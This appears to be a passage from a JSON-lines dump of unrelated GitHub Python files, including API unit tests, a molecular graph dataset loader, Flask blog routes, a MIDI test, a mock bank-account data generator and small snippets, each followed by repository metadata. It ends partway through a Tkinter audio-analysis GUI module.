UserInfo(\n login=rands(),\n password=Password.from_plain(rands()),\n src_login=rands(),\n )\n for _ in range(3)\n ]\n\n @pytest.fixture\n def data(self, users):\n return ujson.dumps({\n 'users': [\n {\n 'login': user.login,\n 'password': user.password.value(),\n 'src_login': user.src_login,\n }\n for user in users\n ]\n })\n\n def test_create_import_from_json_call(self, create_import_from_json_mock, import_params, users, response):\n create_import_from_json_mock.assert_called_once_with(params=import_params, users=users)\n\n class TestSchemaErrorEmptyDomain:\n @pytest.fixture\n def request_params(self, request_params):\n request_params['server'] = ''\n return request_params\n\n @pytest.mark.asyncio\n async def test_json_empty_domain(self, response_json):\n assert_that(\n response_json,\n has_entries({\n 'status': 'fail',\n })\n )\n\n class TestSchemaErrorInvalidPort:\n @pytest.fixture\n def request_params(self, request_params):\n request_params['port'] = 65537\n return request_params\n\n @pytest.mark.asyncio\n async def test_json_invalid_port(self, response_json):\n assert_that(\n response_json,\n has_entries({\n 'status': 'fail',\n })\n )\n\n class TestUnknownMimeError:\n @pytest.fixture\n def headers(self):\n return {}\n\n def test_unknown_mime(self, response_json):\n assert_that(\n response_json,\n has_entries({\n 'code': 415,\n 'data': has_entries({\n 'message': 'Unsupported media type',\n }),\n })\n )\n\n\nclass TestStatImport:\n @pytest.fixture\n def import_stat(self, randn):\n return ImportStat(\n total=randn(),\n errors=randn(),\n finished=randn(),\n )\n\n @pytest.fixture(autouse=True)\n def action(self, mock_action, import_stat):\n from mail.ipa.ipa.core.actions.stats.summary import GetImportStatAction\n return mock_action(GetImportStatAction, import_stat)\n\n @pytest.fixture\n async def response(self, org_id, app):\n return await app.get(f'/import/{org_id}/stat/')\n\n @pytest.fixture\n async def response_data(self, response):\n return (await response.json())['data']\n\n def test_response_data(self, import_stat, response_data):\n assert response_data == {\n 'total': import_stat.total,\n 'errors': import_stat.errors,\n 'finished': import_stat.finished,\n }\n\n def test_action_call(self, org_id, action, response):\n action.assert_called_once_with(org_id=org_id)\n\n\nclass TestInfoImport:\n @pytest.fixture\n def has_more(self):\n return True\n\n @pytest.fixture\n async def result(self, org_id, create_user, create_collector, has_more):\n result = [\n (await create_user(org_id), None, UserImportError.UNKNOWN_ERROR)\n for _ in range(3)\n ]\n for _ in range(3):\n user = await create_user(org_id)\n collector = await create_collector(user_id=user.user_id)\n error = UserImportError.UNKNOWN_ERROR\n result.append((user, collector, error))\n return result, has_more\n\n @pytest.fixture(autouse=True)\n def action(self, mock_action, result):\n from mail.ipa.ipa.core.actions.stats.info import GetImportInfoAction\n return mock_action(GetImportInfoAction, result)\n\n @pytest.fixture\n def only_errors(self):\n return True\n\n @pytest.fixture\n async def response(self, app, org_id, only_errors):\n params = {}\n if only_errors is not None:\n params['only_errors'] = str(only_errors).lower()\n return await app.get(f'/import/{org_id}/', params=params)\n\n @pytest.fixture\n async def response_json(self, response):\n return await response.json()\n\n def test_response_status(self, response):\n assert response.status == 200\n\n @pytest.mark.parametrize('has_more', (True, False))\n def test_response(self, 
result, response_json):\n        assert response_json == {\n            'code': 200,\n            'status': 'success',\n            'data': {\n                'has_more': result[1],\n                'collectors': [\n                    {\n                        'uid': user.uid,\n                        'login': user.login,\n                        'error': error.value,\n                        **(\n                            {} if collector is None else {\n                                'collected': collector.collected,\n                                'total': collector.total,\n                                'errors': collector.errors,\n                                'params': {\n                                    'delete_msgs': collector.params.delete_msgs,\n                                    'imap': collector.params.imap,\n                                    'mark_archive_read': collector.params.mark_archive_read,\n                                    'port': collector.params.port,\n                                    'server': collector.params.server,\n                                    'ssl': collector.params.ssl,\n                                    'src_login': collector.params.src_login,\n                                }\n                            }\n                        )\n                    }\n                    for user, collector, error in result[0]\n                ],\n            }\n        }\n\n    @pytest.mark.parametrize('only_errors', (None, True, False))\n    def test_call(self, org_id, action, response, only_errors):\n        action.assert_called_once_with(org_id=org_id, only_errors=only_errors or False)\n\n\nclass TestReportImportHandler:\n    @pytest.fixture\n    def csv_content(self):\n        return '1,2,3\\n4,5,6\\n'\n\n    @pytest.fixture(autouse=True)\n    def action(self, mock_action, csv_content):\n        async def dummy_run(self):\n            await self._init_kwargs['output'].write(csv_content.encode('utf-8'))\n\n        from mail.ipa.ipa.core.actions.report import WriteCSVReportAction\n        return mock_action(WriteCSVReportAction, action_func=dummy_run)\n\n    @pytest.fixture\n    async def response(self, org_id, app):\n        return await app.get(f'/import/{org_id}/report/')\n\n    @pytest.fixture\n    async def response_body(self, response):\n        return await response.text()\n\n    def test_response_status(self, response):\n        assert response.status == 200\n\n    def test_response_body(self, csv_content, response_body):\n        assert response_body == csv_content\n\n    def test_response_headers(self, response):\n        assert_that(\n            response.headers,\n            has_entries({\n                'Content-Type': 'text/csv; charset=utf-8',\n                'Content-Disposition': 'attachment; filename=\"report.csv\"',\n            })\n        )\n\n    def test_action_call(self, org_id, action, response):\n        action.assert_called_once_with(\n            org_id=org_id,\n            output=match_equality(instance_of(web.StreamResponse)),\n        )\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"mail/tests/unit/api/test_import_.py","file_name":"test_import_.py","file_ext":"py","file_size_in_byte":12944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5943823311","text":"#!/usr/bin/env python3\n\nfrom asyncio.exceptions import CancelledError\nfrom konashi import *\nimport konashi\nimport logging\nimport asyncio\nimport argparse\n\n\nasync def main(device):\n    try:\n        if device is None:\n            logging.info(\"Scan for konashi devices for 5 seconds\")\n            ks = await KonashiScanner.search(5)\n            if len(ks) > 0:\n                device = ks[0]\n                logging.info(\"Use konashi device: {}\".format(device.name))\n            else:\n                logging.error(\"Could not find a konashi device\")\n                return\n        try:\n            await device.connect(5)\n        except Exception as e:\n            logging.error(\"Could not connect to konashi device '{}': {}\".format(device.name, e))\n            return\n        logging.info(\"Connected to device\")\n\n\n        # enable I2C in standard mode\n        await device.io.i2c.config(konashi.I2CConfig(True, konashi.I2CMode.STANDARD))\n\n        sens_addr = 0x11\n        cnt = 0\n        while True:\n            res, addr, data = await device.io.i2c.transaction(konashi.I2COperation.WRITE, sens_addr, 0, [cnt, 0x10, 0x50])\n            print(\"Result:\", res, \"Address:\", addr, \"Data:\", data)\n            res, addr, data = await device.io.i2c.transaction(konashi.I2COperation.READ, sens_addr, 5, [])\n            
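# The WRITE above pushes three bytes to the sensor, then this READ requests 5\n            # bytes back; checking res before trusting data is assumed to be the caller's job.\n            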
print(\"Result:\", res, \"Address:\", addr, \"Data:\", data)\n await asyncio.sleep(5)\n cnt += 1\n cnt %= 0xFF\n\n\n except (asyncio.CancelledError, KeyboardInterrupt):\n logging.info(\"Stop loop\")\n except Exception as e:\n logging.error(\"Exception during main loop: {}\".format(e))\n raise e\n finally:\n try:\n if device is not None:\n await device.disconnect()\n logging.info(\"Disconnected\")\n except konashi.Errors.KonashiConnectionError:\n pass\n logging.info(\"Exit\")\n\n\nparser = argparse.ArgumentParser(description=\"Connect to a konashi device, setup I2C and read from a VL6180X sensor.\")\nparser.add_argument(\"--device\", \"-d\", type=Konashi, help=\"The konashi device name to use. Ommit to scan and use first discovered device.\")\nargs = parser.parse_args()\n\nlogging.basicConfig(level=logging.INFO)\n\nloop = asyncio.get_event_loop()\nmain_task = None\ntry:\n main_task = loop.create_task(main(args.device))\n loop.run_until_complete(main_task)\nexcept KeyboardInterrupt:\n if main_task is not None:\n main_task.cancel()\n loop.run_until_complete(main_task)\n main_task.exception()\nfinally:\n loop.close()","repo_name":"YUKAI/konashi5-sdk-python","sub_path":"examples/konashi_i2c/konashi_i2c.py","file_name":"konashi_i2c.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"45221231355","text":"import os\nimport os.path as osp\nimport rdkit\nfrom ogb.utils import smiles2graph\nfrom ogb.utils.torch_util import replace_numpy_with_torchtensor\nfrom ogb.utils.url import extract_zip\nimport pandas as pd\nimport numpy as np\nimport datamol as dm\nfrom md5checker import make_hash\nfrom tqdm import tqdm\nimport torch\nfrom dgl.data.utils import download\nfrom torch_geometric.data import InMemoryDataset\nfrom torch_geometric.data import Data\nfrom graphite.utilities.logging import get_logger\nfrom graphite.utilities.io.extract_tar import extract_tar_gz_file\nfrom graphite.utilities.rdkit import add_conformers\nfrom graphite.utilities.ogb import mol2graph\n\nlogger = get_logger(__name__)\n\n\nclass PCQM4Mv23DDataset(InMemoryDataset):\n def __init__(\n self,\n root,\n url_2d: str = 'https://dgl-data.s3-accelerate.amazonaws.com/dataset/OGB-LSC/pcqm4m-v2.zip',\n url_3d: str = \"http://ogb-data.stanford.edu/data/lsc/pcqm4m-v2-train.sdf.tar.gz\",\n smiles2graph=smiles2graph,\n verbose=True,\n transform=None,\n pre_transform=None,\n split_dict_filepath=None,\n descriptor=False,\n fingerprint=False,\n conformers_memmap: str = None,\n conformer_pool_size: int = 1,\n fingerprint_memmap: str = None,\n descriptor_memmap: str = None,\n ):\n \"\"\"\n Pytorch Geometric PCQM4Mv2 dataset object\n - root (str): the dataset folder will be located at root/pcqm4m_kddcup2021\n - smiles2graph (callable): A callable function that converts a SMILES string into a graph object\n * The default smiles2graph requires rdkit to be installed\n\n # todo: add support for radius_graph from `torch_cluster`\n \"\"\"\n self.verbose = verbose\n self.original_root_dir = root\n root_dir = osp.join(root, 'pcqm4m-v2')\n self.root_dir = root_dir\n self.smiles2graph = smiles2graph\n self.folder = root_dir\n self.version = 1\n self.split_dict_filepath = split_dict_filepath\n self.descriptor = descriptor\n self.fingerprint = fingerprint\n self._url_2d = url_2d\n self._url_3d = url_3d\n\n self.include_positions = conformer_pool_size > 0 and conformers_memmap is not None\n self.conformers_memmap = np.memmap(\n conformers_memmap,\n 
dtype='float32',\n mode='r',\n shape=(3746620, 10, 60, 3)\n ) if conformers_memmap is not None else None\n self.conformer_pool_size = conformer_pool_size\n assert self.conformer_pool_size <= 10, \"up to 10 conformers are supported at the moment\"\n\n self.fingerprint_memmap = np.memmap(\n fingerprint_memmap,\n dtype='float32',\n mode='r',\n shape=(3746620, 512)\n ) if fingerprint_memmap is not None else None\n\n self.descriptor_memmap = np.memmap(\n descriptor_memmap,\n dtype='float32',\n mode='r',\n shape=(3746620, 201)\n ) if descriptor_memmap is not None else None\n\n super(PCQM4Mv23DDataset, self).__init__(self.folder, transform, pre_transform)\n\n self.data, self.slices = torch.load(self.processed_paths[0])\n\n @property\n def url_2d(self):\n return self._url_2d\n\n @property\n def url_3d(self):\n return self._url_3d\n\n def maybe_log(self, msg: str, level=\"info\") -> None:\n if self.verbose:\n getattr(logger, level)(msg)\n\n def delete_data(self):\n self.data = None\n self.slices = None\n\n def load_data(self):\n self.data, self.slices = torch.load(self.processed_paths[0])\n\n def __getitem__(self, idx):\n if self.data is None:\n self.load_data()\n\n return super().__getitem__(idx)\n\n def get(self, idx):\n g = super().get(idx)\n\n if self.fingerprint:\n if self.fingerprint_memmap is None and 'fingerprint' not in g:\n raise Exception(\"~> the cached dataset, as is, does not contain fingerprint information.\"\n \"please consider recreating the dataset or to provide fingerprint memmap.\")\n\n if 'fingerprint' not in g:\n g['fingerprint'] = torch.from_numpy(np.array(self.fingerprint_memmap[idx, :])).float()\n\n if self.descriptor:\n if self.descriptor_memmap is None and 'molecule_descriptor' not in g:\n raise Exception(\"~> the cached dataset, as is, does not contain molecule descriptor information.\"\n \"please consider recreating the dataset or to provide molecule descriptor memmap.\")\n\n if 'molecule_descriptor' not in g:\n g['molecule_descriptor'] = torch.from_numpy(np.array(self.descriptor_memmap[idx, :])).float()\n\n if self.include_positions and 'positions_3d' not in g:\n g.positions_3d = torch.from_numpy(np.array(self.conformers_memmap[idx, np.random.choice(self.conformer_pool_size), :g.num_nodes, :]))\n return g\n\n @property\n def raw_file_names(self):\n return \"data.csv.gz\"\n\n @property\n def processed_file_names(self):\n return \"geometric_data_processed.pt\"\n\n def download(self):\n self.maybe_log(msg=\"downloading raw material...\")\n\n # - the molecules + labels (2d info from smiles)\n self.maybe_log(msg=\"downloading the 2d information on the molecules...\")\n\n download(self.url_2d, self.original_root_dir)\n # assert make_hash(osp.join(self.raw_dir, 'pcqm4m-v2-train.sdf.tar.gz')) == ''\n\n self.maybe_log(msg=\"extracting the 2d information...\")\n extract_zip(osp.join(self.original_root_dir, self.url_2d.rpartition('/')[2]), self.original_root_dir)\n os.unlink(osp.join(self.original_root_dir, self.url_2d.rpartition('/')[2]))\n\n # - the 3d information\n self.maybe_log(msg=\"downloading the 3d information on the atom positionings...\")\n download(self.url_3d, self.raw_dir)\n assert make_hash(osp.join(self.raw_dir, 'pcqm4m-v2-train.sdf.tar.gz')) == 'fd72bce606e7ddf36c2a832badeec6ab'\n\n self.maybe_log(msg=\"extracting 3d info [sdf file]...\")\n extract_tar_gz_file(f\"{osp.join(self.raw_dir, 'pcqm4m-v2-train.sdf.tar.gz')}\")\n\n def process(self):\n data_df = pd.read_csv(osp.join(self.raw_dir, \"data.csv.gz\"))\n # - in the 3d dataset, we wont use the smiles (for 
train) and use the\n # sdf instead.\n smiles_list = data_df[\"smiles\"]\n homolumogap_list = data_df[\"homolumogap\"]\n\n # - reading the 3d file\n print(\"reading the SDF file...\")\n suppl = rdkit.Chem.SDMolSupplier(osp.join(self.raw_dir, 'pcqm4m-v2-train.sdf'))\n\n print(\"Converting SMILES strings into graphs...\")\n from graphite.contrib.kpgt.data.descriptors.rdDescriptors import RDKit2D\n from graphite.contrib.kpgt.data.descriptors.rdNormalizedDescriptors import RDKit2DNormalized\n data_list = []\n train_indices = set(self.get_idx_split()['train'].tolist())\n for i in tqdm(range(len(smiles_list))):\n data = Data()\n\n smiles = smiles_list[i]\n homolumogap = homolumogap_list[i]\n\n # - even for 3d data, we would still\n # use the bonds instead of `radius_graph`\n if i in train_indices:\n mol = suppl[i]\n else:\n mol = rdkit.Chem.MolFromSmiles(smiles)\n graph = mol2graph(mol)\n\n assert len(graph[\"edge_feat\"]) == graph[\"edge_index\"].shape[1]\n assert len(graph[\"node_feat\"]) == graph[\"num_nodes\"]\n\n data.__num_nodes__ = int(graph[\"num_nodes\"])\n data.edge_index = torch.from_numpy(graph[\"edge_index\"]).to(torch.int64)\n data.edge_attr = torch.from_numpy(graph[\"edge_feat\"]).to(torch.int64)\n data.x = torch.from_numpy(graph[\"node_feat\"]).to(torch.int64)\n data.y = torch.Tensor([homolumogap])\n\n # 3d graph for train indices\n if i in train_indices:\n # - storing the positions_3d\n positions = torch.from_numpy(mol.GetConformer(0).GetPositions()).float()\n assert data.num_nodes == positions.shape[0]\n data['positions_3d'] = positions\n else:\n data['positions_3d'] = torch.from_numpy(np.array(\n self.conformers_memmap[i, np.random.choice(self.conformer_pool_size), :data.num_nodes, :]))\n\n if self.descriptor:\n mol = rdkit.Chem.MolFromSmiles(smiles)\n data['fingerprint'] = torch.tensor(rdkit.Chem.RDKFingerprint(mol, minPath=1, maxPath=7, fpSize=512)).long()\n if self.fingerprint:\n data['molecule_descriptor'] = torch.tensor(RDKit2DNormalized().process(smiles)).float()\n\n if self.pre_transform is not None and i == 0:\n # - testing pre-transform\n _ = self.pre_transform(data)\n\n data_list.append(data)\n\n # double-check prediction target\n split_dict = self.get_idx_split()\n assert all([not torch.isnan(data_list[i].y)[0] for i in split_dict[\"train\"]])\n assert all([not torch.isnan(data_list[i].y)[0] for i in split_dict[\"valid\"]])\n assert all([torch.isnan(data_list[i].y)[0] for i in split_dict[\"test-dev\"]])\n assert all(\n [torch.isnan(data_list[i].y)[0] for i in split_dict[\"test-challenge\"]]\n )\n\n if self.pre_transform is not None:\n print(\"applying pre-processing transform...\")\n data_list = [self.pre_transform(data) for data in tqdm(data_list)]\n\n data, slices = self.collate(data_list)\n\n print(\"Saving...\")\n torch.save((data, slices), self.processed_paths[0])\n\n def get_idx_split(self):\n if self.split_dict_filepath is None:\n split_dict = replace_numpy_with_torchtensor(\n torch.load(osp.join(self.root, \"split_dict.pt\"))\n )\n else:\n split_dict = replace_numpy_with_torchtensor(\n torch.load(self.split_dict_filepath)\n )\n return split_dict\n","repo_name":"shayanfazeli/graphite_pcqm4mv2","sub_path":"graphite/data/pcqm4mv2/pyg/dataset_3d.py","file_name":"dataset_3d.py","file_ext":"py","file_size_in_byte":10199,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"10222679786","text":"from flask import Blueprint,render_template,redirect,url_for,flash,request\nfrom blogapp import db\nfrom 
blogapp.post.forms import AddPostForm\nfrom blogapp.post.models import PostModel\nfrom flask_login import login_required\n\npost=Blueprint('post',__name__,url_prefix='/post')\n\n\n@post.route('/<int:id>')\n@login_required\ndef view_post(id):\n    post=PostModel.query.get_or_404(id)\n    return render_template('post/post.html',post=post)\n\n@post.route('/create/<int:id>',methods=['GET','POST'])\n@login_required\ndef create_post(id):\n    form=AddPostForm()\n    if form.validate_on_submit():\n        post=PostModel(title=form.title.data,content=form.content.data,blog_id=id)\n        db.session.add(post)\n        db.session.commit()\n        flash(\"post created successfully!\",'success')\n        return redirect(url_for('blog.view_blog',id=id))\n    return render_template('post/create_post.html',form=form,form_title='create new post')\n\n@post.route('/update/<int:id>',methods=['GET','POST'])\n@login_required\ndef update_post(id):\n    post=PostModel.query.get_or_404(id)\n    form=AddPostForm()\n    if request.method=='GET':\n        form.title.data=post.title\n        form.content.data=post.content\n        form.submit.label.text='update'\n\n    if form.validate_on_submit():\n        post.title=form.title.data\n        post.content=form.content.data\n        db.session.commit()\n        flash('post updated successfully!','success')\n        return redirect(url_for('post.view_post',id=id))\n    \n    return render_template('post/create_post.html',form=form,form_title='update post')\n\n@post.route('/delete/<int:id>')\n@login_required\ndef delete_post(id):\n    post=PostModel.query.get_or_404(id)\n    if post:\n        db.session.delete(post)\n        db.session.commit()\n        flash('post deleted successfully!','danger')\n    return redirect(url_for('user.home'))\n    ","repo_name":"zuber-shekh-rapidops/FlaskBlogApp","sub_path":"blogapp/post/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10536836818","text":"import jack\nimport binascii\nimport struct\n\nclient = jack.Client('MIDI-Monitor')\ninport = client.midi_inports.register('input')\n\noutport = client.midi_outports.register('output')\n\n\n@client.set_process_callback\ndef process(frames):\n\toutport.clear_buffer()\n\t\n\tfor offset, data in inport.incoming_midi_events():\n\t\tprint('{0}: 0x{1}'.format(client.last_frame_time + offset,binascii.hexlify(data).decode()))\n\t\t\n\t\tif len(data) == 3:\n\t\t\tstatus, pitch, vel = struct.unpack('3B', data)\n\t\t\tprint(offset)\n\t\t\tif vel == 127:\n\t\t\t\tprint ('huuarray')\n\t\t\t\toutport.write_midi_event(offset, data)\n\t\t\t\toutport.write_midi_event(offset, (status, pitch + 1, vel))\n\t\t\n\nwith client:\n\tprint('#' * 80)\n\tprint('press Return to quit')\n\tprint('#' * 80)\n\tinput()\n","repo_name":"flappix/raspberry-looper","sub_path":"jack_midi_test.py","file_name":"jack_midi_test.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"738638244","text":"import json\nfrom faker import Faker\nfrom faker.providers import phone_number\nimport pandas as pd\nfrom argparse import ArgumentParser\n\n\nclass AccountProfileMockGenerator:\n    def __init__(self):\n        self.fake = Faker(locale=\"en_IN\")\n        self.fake.add_provider(phone_number)\n        self.index = 0\n        self.occurance_ratio = 0\n        self.active_account_prob = 80\n        self.event_count = 1\n        self.bank_codes = [\n            \"ANDB\",\n            \"ARBN\",\n            \"BARB\",\n            \"BOIN\",\n            \"CBIN\",\n            \"CNRB\",\n            \"CORP\",\n            \"FBIN\",\n            \"HDFC\",\n            \"IDFB\",\n            \"INRB\",\n            \"ISBK\",\n            \"KKBK\",\n            \"KVCB\",\n            \"SBHY\",\n            \"SBIN\",\n            
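# Four-letter bank codes; bothify('?', letters=...) below draws one whole code,\n            # since Faker picks an element (not a single character) when given a list.\n            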
\"SIBL\",\n \"UCBS\",\n \"UTIB\",\n \"SYNB\"\n ]\n self.account_type_enum=[\"CURRENT\", \"SAVINGS\"]\n self.account_status_enum=[\"ON_HOLD\", \"SUSPENDED\", \"CLOSED\"]\n \n def generate_name_ifsc_combination(self):\n ifsc = self.fake.bothify(text=\"?\", letters=self.bank_codes) + self.fake.bothify(\n text=\"0######\"\n )\n name = self.fake.name()\n accno = self.fake.bothify(text=\"###############\")\n return name, ifsc, accno\n\n def generate_events(self, event_count):\n self.event_count = event_count\n events = []\n event_count = int(event_count)\n for i in range(event_count):\n self.index = i\n self.occurance_ratio = (i / event_count) * 100\n events.append(self.generate_event())\n return events\n\n def get_account_status(self):\n if self.active_account_prob > self.occurance_ratio:\n return \"ACTIVE\"\n else:\n return self.fake.bothify(\n text=\"?\", letters=self.account_status_enum\n )\n\n def generate_event(self):\n account_name, ifsc_code, account_number = self.generate_name_ifsc_combination()\n event = {\n \"account_name\": account_name,\n \"ifsc_code\": ifsc_code,\n \"account_number\": account_number,\n \"account_type\": self.fake.bothify(text=\"?\", letters=self.account_type_enum),\n \"account_status\": self.get_account_status(),\n }\n return event\n\ndef write_events_to_output(events):\n df = pd.DataFrame(events)\n df.to_json(\"../sample-files/account_profile.json\", lines=True, orient=\"records\")\n\nif __name__ == \"__main__\":\n parser = ArgumentParser(\"Mock Data Generator\")\n parser.add_argument(\n \"-n\", \"--event_count\", type=int, default=1, help=\"Specify the number of events\"\n )\n args = parser.parse_args()\n event_generator = AccountProfileMockGenerator()\n events = event_generator.generate_events(args.event_count)\n write_events_to_output(events)\n","repo_name":"Sanketika-Obsrv/obsrv-adhoc-scripts","sub_path":"fraud_detection/mock-data-generator/src/account_profile.py","file_name":"account_profile.py","file_ext":"py","file_size_in_byte":2841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10870754497","text":"#!/usr/bin/python3\n\n'''\nthe following finds the difference between two iterables by keeping only the\nvalues that are in the firts one.\n'''\n\ndef difference(a, b):\n set_a = set(a)\n set_b = set(b)\n comparison = set_a.difference(set_b)\n print(comparison)\n return list(comparison)\n\nif __name__ == \"__main__\":\n a = [1,2,3,4]\n b = [1,2,3,]\n\n assert difference(a,b) == [4]\n \n","repo_name":"readingwritingcode/pythonSnipets","sub_path":"snipets/difference.py","file_name":"difference.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9005425","text":"#density fn can have values larger than 1\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nmeanval=0.0\nsdval=0.2\nxlow= meanval-3*sdval\nxhigh= meanval+3*sdval\ndx=0.002 #interval width\n#specify points between low and high points\n# We can use np.arange() to create an array of values starting from the start value\n# and incrementally going up to end value by incrementing up by the step value.\n# step is by default set to 1. 
It is very similar to np.linspace as both output arrays\n# which start and stop at given values and with a certain number of values in the array, or rather,\n# with a step size that gets us from the start to the end.\nx = np.arange(xlow, xhigh, dx)\n# Compute y values, i.e., probability density at each value of x:\n#y is also array of values\ny=(1/(sdval*np.sqrt(2*np.pi)))*np.exp(-0.5*((x-meanval)/sdval)**2)\nplt.plot(x,y)\n# A stem plot plots vertical lines (using linefmt) at each x location from the baseline to y,\n# and places a marker there using markerfmt.\n# A horizontal line at 0 is plotted using basefmt.\nplt.stem(x, y, markerfmt=' ')\nplt.xlabel('$x$')\nplt.ylabel('$p(x)$')\nplt.title('Normal Probability Density')\n# Approximate the integral as the sum of width * height for each interval.\narea = np.sum(dx*y)\n# print(area)\n# Display info in the graph.\nplt.text(-.6, 1.7, '$\\\mu$ = %s' % meanval)\nplt.text(-.6, 1.5, '$\\\sigma$ = %s' % sdval)\nplt.text(.2, 1.7, '$\\\Delta x$ = %s' % dx)\nplt.text(.2, 1.5, '$\\\sum_{x}$ $\\\Delta x$ $p(x)$ = %5.3f' % area)\n# Save before showing: once show() returns, the figure can be empty on some backends.\nplt.savefig('normal.3.png')\nplt.show()\n","repo_name":"aseempahuja/MarketingModels2","sub_path":"Ex_integral_of_density.py","file_name":"Ex_integral_of_density.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9913254557","text":"from common import ListNode\n\n\nclass Solution:\n    def removeElements(self, head: ListNode, val: int) -> ListNode:\n        dummy = ListNode(next=head)\n        prev = dummy\n        while head:\n            if head.val != val:\n                prev.next = head\n                prev = prev.next\n            head = head.next\n        prev.next = None  # sever any trailing nodes that matched val\n        return dummy.next\n\n\nif __name__ == \"__main__\":\n    next = ListNode()\n    next.val = 1\n    head = None\n    for v in [2, 2, 1]:\n        head = ListNode()\n        head.val = v\n        head.next = next\n        next = head\n\n    res = Solution().removeElements(head, 2)\n    pass\n","repo_name":"Pravuk/leetcode_practice","sub_path":"remove_linked_list_elements.py","file_name":"remove_linked_list_elements.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69968684392","text":"import sys\nimport tkinter as tk\nimport tkinter.filedialog\nimport tkinter.messagebox\n\nfrom itertools import chain\nfrom timeit import default_timer as timer\nfrom typing import NamedTuple, Optional, Tuple\nfrom . import audiofileservice as af, appsettings, colourmap\nfrom .amplitudegraphframe import AmplitudeGraphFrame\nfrom .appsettings import COLOUR_MAPS\nfrom .appsettingsmodal import AppSettingsWindow\nfrom .audiofileservice import AudioFileService\nfrom .breadcrumbservice import BreadcrumbService, Breadcrumb\nfrom .buttonframe import ButtonFrame\nfrom .common import AxisRange\nfrom .constants import *\nfrom .fileinfoframe import FileInfoFrame\nfrom .frames import DrawableFrame\nfrom .graphsettings import GraphSettings\nfrom .historianservice import HistorianService\nfrom .rendering import SpectrogramPipeline, SpectrogramFftStep, \\\nAmplitudePipeline, ProfilePipeline, GraphParams, SpectrogramDataReaderStep\nfrom .profilegraphframe import ProfileGraphFrame\nfrom .readoutframe import ReadoutFrame, SettingsButton\nfrom .moreframe import MoreTopFrame\nfrom .spectrogramgraphframe import SpectrogramGraphFrame\nfrom .wavfileparser import WavFileError\nfrom .about import AboutWindow\nfrom . 
import get_asset_path\n\n# One day, we will define the menus using a table including shortcuts and underlined letters:\nMENU_TEXT_FILE = \"File\"\nMENU_TEXT_ABOUT = \"About\"\nMENU_TEXT_SETTINGS = \"Settings\"\nMENU_TEXT_OPEN_MAIN = \"Open\"\nMENU_TEXT_OPEN_RECENT_MAIN = \"Open recent\"\nMENU_TEXT_OPEN_REF = \"Open reference\"\nMENU_TEXT_OPEN_RECENT_REF = \"Open recent as reference\"\nMENU_TEXT_CLOSE_MAIN = \"Close\"\nMENU_TEXT_CLOSE_REF = \"Close reference\"\n# MENU_TEXT_SAVE = \"Save\"\nMENU_TEXT_EXIT = \"Exit\"\n\nprogram_directory = sys.path[0]\n\n\nclass SettingsButtonsController:\n \"\"\"\n Encapsulate the bit of logic relating to showing and hiding the settings frames in response\n the more/less buttons being pressed.\n \"\"\"\n _NONE = 0\n _MAIN = 1\n _REF = 2\n\n def __init__(self, parent: tk.Frame, main_settings_button: SettingsButton, main_settings_frame: tk.Frame,\n ref_settings_button: SettingsButton, ref_settings_frame: tk.Frame):\n self._parent = parent\n self._state: int = self._NONE\n self._main_settings_button: SettingsButton = main_settings_button\n self._ref_settings_button: SettingsButton = ref_settings_button\n self._main_settings_frame = main_settings_frame\n self._ref_settings_frame = ref_settings_frame\n\n self._main_settings_button.configure(command=self.on_main_settings)\n self._ref_settings_button.configure(command=self.on_ref_settings)\n\n self.on_reset()\n\n def on_reset(self):\n self._state = self._NONE\n self._do_update()\n\n def on_main_settings(self):\n if self._state == self._MAIN:\n self._state = self._NONE\n else:\n self._state = self._MAIN\n self._do_update()\n\n def on_ref_settings(self):\n if self._state == self._REF:\n self._state = self._NONE\n else:\n self._state = self._REF\n self._do_update()\n\n def _do_update(self):\n if self._state == self._MAIN:\n self._main_settings_button.update_button_appearance(True, False)\n self._ref_settings_button.update_button_appearance(False, True)\n self._main_settings_frame.grid()\n self._ref_settings_frame.grid_remove()\n elif self._state == self._REF:\n self._main_settings_button.update_button_appearance(False, True)\n self._ref_settings_button.update_button_appearance(True, False)\n self._main_settings_frame.grid_remove()\n self._ref_settings_frame.grid()\n else:\n self._main_settings_button.update_button_appearance(False, False)\n self._ref_settings_button.update_button_appearance(False, False)\n self._main_settings_frame.grid_remove()\n self._ref_settings_frame.grid_remove()\n\n # We have to tell the parent frame to reduce size, it doesn't do this\n # automatically when we remove the settings frames sadly:\n self._parent.configure(height=0, width=100) # Width has to be non zero for some reason.\n\n\nclass GraphPipelines(NamedTuple):\n \"\"\"A tuple of rendering pipelines relating to a set of graphs.\"\"\"\n amplitude: Optional[AmplitudePipeline]\n spectrogram: Optional[SpectrogramPipeline]\n profile: Optional[ProfilePipeline]\n\n\nclass PanelFrame(tk.Frame):\n \"\"\"This is a Frame which contains the set of graphs relating to the main or the reference data.\"\"\"\n\n def __init__(self, parent, root, pipelines: GraphPipelines, data_context, settings, settings_frame, pad, is_reference):\n super().__init__(parent)\n\n self._pipelines = pipelines\n self._dc = data_context\n self._settings = settings\n self._settings_frame = settings_frame\n\n col = 0\n self._fileinfo_frame = FileInfoFrame(self, self._dc)\n self._fileinfo_frame.grid(row=0, column=col, columnspan=3, pady=(pad, 0), sticky='ew', padx=pad)\n\n 
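# The button frame hosts the navigation controls and shares the breadcrumb\n        # service with this panel, so zoom history survives across the widgets below.\n        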
